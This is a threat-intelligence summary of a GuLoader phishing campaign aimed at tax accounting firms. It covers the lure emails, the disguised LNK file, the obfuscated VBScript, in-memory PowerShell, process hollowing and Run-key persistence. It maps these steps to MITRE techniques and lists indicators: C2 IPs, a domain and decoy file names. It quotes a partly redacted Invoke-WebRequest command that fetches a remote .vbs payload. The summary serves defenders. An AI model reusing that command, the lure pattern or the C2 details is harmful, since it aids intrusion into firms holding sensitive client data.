Threat Research

Tax firms targeted by precision malware attacks

Securonix

Tax accounting firms and CPAs are being targeted during peak tax season with a precision malware attack delivering GuLoader via social engineering and a novel Windows-based exploit. The operation starts with a deceptive email, followed by a password‑protected ZIP containing a disguised Windows Shortcut and decoys, which leads to in-memory PowerShell payloads and active C2 communication. #GuLoader #newmansubzero #TaxFirms

Keypoints

  • Attack targets tax preparation firms (Sophos customers) during peak US tax season.
  • Initial contact uses a social-engineering email with a benign-looking solicitation and then a follow-up linking to a password-protected ZIP hosted in cloud storage.
  • The ZIP contains a Windows Shortcut (LNK) and decoy files; the LNK is disguised to look like a PDF and leads to code execution.
  • Inside the ZIP, a heavily obfuscated Visual Basic Script is used to download and execute a PowerShell-based payload in memory (no disk write).
  • The malware performs process hollowing into ielowutil.exe and uses Registry-based persistence (Run key) to run PowerShell on reboot.
  • C2 communications target multiple IPs and a domain (e.g., 64.44.101.171:9191, 84.21.172.49:1040, 185.225.74.91:2080, newmansubzero.com).

MITRE Techniques

  • [T1566.002] Phishing: Spearphishing via Link – The attacker uses an email solicitation and a follow-up with a link to a password-protected Zip file hosted on cloud storage. “The initial message to the target is benign, with a subject line of Prospective Client Enquiries … The attacker then sends a follow-up email with a link to a password-protected Zip file hosted on a cloud storage service.”
  • [T1204.002] User Execution: Malicious File – The target double-clicks a Windows Shortcut (.LNK) that is disguised as a PDF and triggers further actions. “The target would then, naturally, double click the other file in the Zip archive — a Windows Shortcut (.LNK) labeled with a PDF file suffix…”
  • [T1059.005] Visual Basic – The initial infector is a heavily obfuscated Visual Basic Script that decodes and executes commands. “A heavily obfuscated, and very large at more than 200KB in size” … “The VBS contains two large variables … and execute PowerShell commands.”
  • [T1059.001] PowerShell – The decoded PowerShell script loads the final payload into memory and executes it without writing to disk. “The PowerShell script decoded from the Ir8 variable uses Reflection.Assembly to load the final payload into memory from a Registry value without writing it to disk.”
  • [T1105] Ingress Tool Transfer – The downloader pulls down a VBScript from a remote URL to begin the infection chain. “Invoke-WebRequest http://0x[two hex bytes]…/fresh/fordl.vbs -OutFile C:WindowsTasks[eight letters].vbs”
  • [T1055.012] Process Hollowing – The malware injects into ielowutil.exe using process hollowing. “the malware injected itself, using process hollowing, into ielowutil.exe”
  • [T1547.001] Boot or Logon Autostart: Run Keys/Startup Folder – The malware creates a Run key that invokes PowerShell on every reboot. “It created a Run key in the Registry named Overproduce that invokes the SaltoQ variable to run a PowerShell command at every reboot.”
  • [T1071.001] Application Layer Protocol: Web Protocols (C2) – Infected hosts contact C2 servers to receive commands, e.g., 64.44.101.171:9191, 84.21.172.49:1040, 185.225.74.91:2080. “Once infected, the ielowutil.exe binary constantly attempts to contact its command–and-control server, on 64.44.101.171:9191.” and “live as of publication … 84.21.172.49:1040 and 185.225.74.91:2080.”
  • [T1027] Obfuscated/Compressed Files and Information – The VBScript payload is heavily obfuscated with base64 blocks and encrypted data. “A block of base64-encoded, encrypted data comprises almost 150KB of that script, along with code that decodes and decrypts the block of base64.”

Indicators of Compromise

  • [IP] 64.44.101.171:9191 – C2 server contacted by ielowutil.exe during infection.
  • [IP] 84.21.172.49:1040 – C2 server observed in some samples.
  • [IP] 185.225.74.91:2080 – C2 server observed in some samples.
  • [Domain] newmansubzero.com – Domain used for C2 activity.
  • [File] screenshot1242.jpeg – Decoy file name inside ZIP archive.
  • [File] privatecopy.pdf – Another decoy file inside ZIP archive.

Read more: https://news.sophos.com/en-us/2023/04/13/tax-firms-targeted-by-precision-malware-attacks/